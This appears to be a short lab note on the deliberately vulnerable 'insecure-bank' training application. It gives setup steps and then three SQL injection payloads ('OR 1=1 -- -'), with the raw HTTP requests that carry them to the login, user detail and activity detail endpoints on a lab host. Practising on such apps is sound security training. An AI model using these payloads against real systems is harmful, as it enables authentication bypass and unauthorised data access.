Insecure bank

Setup

https://github.com/hdiv/insecure-bank
http://localhost:8080/insecure-bank/
- Username: john or doug or ray
- Password: test

sudo apt install git
sudo apt install maven

git clone https://github.com/hdiv/insecure-bank.git

mvn clean package
mvn cargo:run

Payload

hacker' OR 1=1 -- -

Request

POST /insecure-bank/login HTTP/1.1
Host: 10.0.2.15:8080

username=administrator%27+OR+1%3D1+--+-&password=

Payload

any' or 1=1 -- -

Request

GET /insecure-bank/dashboard/userDetail?username=any%27%20or%201=1%20--%20- HTTP/1.1
Host: 10.0.2.15:8080

Payload

number=0' or 1=1 -- -

Request

POST /insecure-bank/activity/detail HTTP/1.1
Host: 10.0.2.15:8080

number=0' or 1=1 -- -